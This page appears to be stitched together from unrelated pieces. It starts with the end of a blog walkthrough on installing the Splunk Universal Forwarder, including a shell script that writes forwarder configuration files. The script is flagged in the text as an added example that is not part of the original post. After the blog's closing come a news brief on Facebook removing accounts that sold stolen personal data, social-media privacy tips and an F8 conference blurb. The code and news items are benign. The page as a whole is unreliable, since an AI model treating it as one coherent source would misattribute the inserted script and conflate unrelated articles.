Checking mgmt port [8089]: open
Checking conf files for problems...
Done
Checking default conf files for edits...
Validating installed files against hashes from '/opt/splunkforwarder/splunkforwarder-7.1.0-2e75b3406c5b-linux-2.6-x86_64-manifest'
All installed files intact.
Done
All preliminary checks passed.

Starting splunk server daemon (splunkd)...  
Done
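The two interactive commands above (set deploy-poll and add monitor) each write one stanza to a Splunk configuration file, and the forwarder only reads those files on (re)start, which is why one restart at the end is enough. The following POSIX shell script is an added example, not part of the original post or of Splunk's own tooling: it writes the same settings directly as configuration files, so they can be verified before the restart. The file locations and stanza names (deploymentclient.conf under etc/system/local, inputs.conf under etc/apps/search/local) are the standard Splunk locations for settings made via the CLI; the hostname and path are the ones used in the walkthrough, with XXXX still standing for the masked instance id, and the function names are my own.

```shell
#!/bin/sh
# Added example: produce the Universal Forwarder settings that
# "./splunk set deploy-poll" and "./splunk add monitor" create, directly as
# configuration files, so that one "./splunk restart" applies both.
set -e

# write_uf_config SPLUNK_HOME DEPLOY_SERVER MONITOR_PATH
# DEPLOY_SERVER e.g. input-prd-p-XXXX.cloud.splunk.com:8089 (XXXX = masked id)
# MONITOR_PATH  e.g. /var/log
write_uf_config() {
    splunk_home="$1"
    deploy_server="$2"
    monitor_path="$3"

    sys_local="$splunk_home/etc/system/local"
    app_local="$splunk_home/etc/apps/search/local"
    mkdir -p "$sys_local" "$app_local"

    # Equivalent of: ./splunk set deploy-poll DEPLOY_SERVER
    printf '[target-broker:deploymentServer]\ntargetUri = %s\n' "$deploy_server" \
        > "$sys_local/deploymentclient.conf"

    # Equivalent of: ./splunk add monitor MONITOR_PATH
    # Appended rather than overwritten so earlier monitors survive; an already
    # present stanza is skipped, which keeps repeated runs idempotent.
    inputs="$app_local/inputs.conf"
    touch "$inputs"
    if ! grep -qF "[monitor://$monitor_path]" "$inputs"; then
        printf '[monitor://%s]\ndisabled = false\n\n' "$monitor_path" >> "$inputs"
    fi
    # Conf files are only read when splunkd starts: restart once afterwards.
}

# verify_uf_config SPLUNK_HOME DEPLOY_SERVER MONITOR_PATH
# Returns 0 when both settings are present, 1 otherwise (reports what is missing).
verify_uf_config() {
    splunk_home="$1"
    deploy_server="$2"
    monitor_path="$3"
    status=0
    grep -qF "targetUri = $deploy_server" \
        "$splunk_home/etc/system/local/deploymentclient.conf" 2>/dev/null \
        || { echo "missing deploy-poll target $deploy_server" >&2; status=1; }
    grep -qF "[monitor://$monitor_path]" \
        "$splunk_home/etc/apps/search/local/inputs.conf" 2>/dev/null \
        || { echo "missing monitor stanza for $monitor_path" >&2; status=1; }
    return $status
}

# Demonstration against a scratch directory (set UF_DEMO=1 to run it).
# On a real forwarder pass /opt/splunkforwarder and then run ./splunk restart.
if [ "${UF_DEMO:-0}" = "1" ]; then
    demo_home=$(mktemp -d)
    write_uf_config "$demo_home" input-prd-p-XXXX.cloud.splunk.com:8089 /var/log
    verify_uf_config "$demo_home" input-prd-p-XXXX.cloud.splunk.com:8089 /var/log \
        && echo "forwarder config ok, restart splunkd to apply"
    cat "$demo_home/etc/system/local/deploymentclient.conf" \
        "$demo_home/etc/apps/search/local/inputs.conf"
    rm -rf "$demo_home"
fi
```

Writing the files this way also avoids the repeated "Your session is invalid. Please login." prompts, since no CLI session is involved; the forwarder picks everything up on the single restart that follows.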

At this point I return to the Splunk Cloud Web interface and click the "search" feature. I see Splunk is indexing some data.


I run a search for "host=debian" and find my logs.


Not too bad! Have you tried Splunk Cloud? What do you think? Leave me a comment below.

Update: I installed the Universal Forwarder on FreeBSD 11.1 using the method above (except with a FreeBSD .tgz) and everything seems to be working!

FACEBOOK REMOVES MALICIOUS ACCOUNTS

IN BRIEF: Facebook Inc has removed several malicious accounts and pages that advertised and sold social security numbers, addresses, phone numbers, and alleged credit card numbers of dozens of people, and it says it will continue to do so as needed.
----------------------------------------

A Facebook spokesman said the company removes posts containing information such as social security numbers or credit card details when it becomes aware of them.

Facebook has also deleted almost 120 private discussion groups of more than 300,000 members, after being alerted by a report from journalist Brian Krebs that the groups flagrantly promoted a host of illicit activities, including spamming, wire fraud, account takeovers, and phony tax refunds.

The biggest collection of groups banned were those promoting the sale and use of stolen credit and debit card accounts, and the next largest collection of groups included those facilitating takeovers of online accounts such as Amazon, Google, Netflix, and PayPal.

A Google search still pulls up a few public Facebook posts that offer to sell personal details including credit card numbers.

Hackers have advertised databases of private information on the social platform, and posts containing stolen identities and social security numbers have remained on Facebook for years.

It is reported that at least some of the data in these posts appeared to be real: the first four digits of the social security numbers, as well as the names, addresses, and dates of birth, were confirmed for four people whose data appears in a post from July 2014.

Tech companies are under intense scrutiny about how they protect customer data after Facebook was embroiled in a huge scandal where millions of users’ data were improperly accessed by a political consultancy.

KEEP PERSONAL INFORMATION SAFE ON SOCIAL MEDIA

The big question most people ask is: who is responsible for protecting one's privacy? It should be understood that everyone is responsible for protecting his or her own privacy.

How do you do that?
Treat the "about me" fields as optional.
Know the people you friend.
Become a master of privacy settings.
Create strong, private passwords.
Create and use an "off-limits" list.
Always log out when you're done.
Limit or deny access to third-party applications.
Get alerts on suspicious activity.

FACEBOOK F8 DEVELOPER CONFERENCE

It is shaping up to be the biggest Facebook event ever, with 5,000 developers flying in from around the world. They will hear exciting news about the company's plans to advance on many fronts, from artificial intelligence to virtual reality.

They'll also get the chance to interact with the senior team, and to find out how they can profit from this very powerful platform.

Last year, Mark Zuckerberg filled his F8 keynote speech with cool demos about augmented reality. At this year's F8, he said, he is going to share more about the work Facebook is doing to keep people safe, and to keep building services that help individuals connect in more meaningful ways.